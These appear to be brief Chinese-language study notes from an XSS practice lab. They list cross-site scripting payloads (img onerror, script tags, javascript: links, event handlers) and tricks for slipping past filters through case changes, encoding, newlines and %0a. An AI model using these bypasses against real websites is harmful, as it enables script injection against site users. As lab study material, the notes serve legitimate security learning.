error事件
<img src="" one rror=alert(1)>
<script>alert(1)</script>
() = ``
\u003c \u003e
固定网址 加数字 one rror=alert(1)
没有匹配换行符, 可以通过换行来绕过匹配
表单无法逃避
type="image" src="" one rror=alert(1)
通过html事件跳过<>过滤
onblur 当元素失去焦点时运行脚本 type="text" 搜索框
字符串过滤 html代码可以考虑大小写 重写
xss 伪协议
<a href="javascript:alert(/xss/)" >1</a>
过滤大小写的 尝试使用url和html编码
%0a代替空格
ng-include: '调用本地文件'
http://127.0.0.1/xss/level15.php?src='level1.php?name=<img src=1 one rror=alert(1)>'
onmouseover 鼠标移动到图片上执行javascript代码
<button onclick=""> 点击按钮触发事件